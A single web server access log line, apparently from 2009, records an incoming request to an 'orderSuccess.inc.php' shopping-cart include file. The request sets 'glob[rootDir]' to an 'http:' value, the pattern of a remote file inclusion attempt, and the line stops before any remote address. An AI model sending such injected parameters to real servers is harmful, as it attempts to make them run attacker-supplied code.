67.15.82.66 - - [30/Jan/2009:12:39:06 -0800] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http: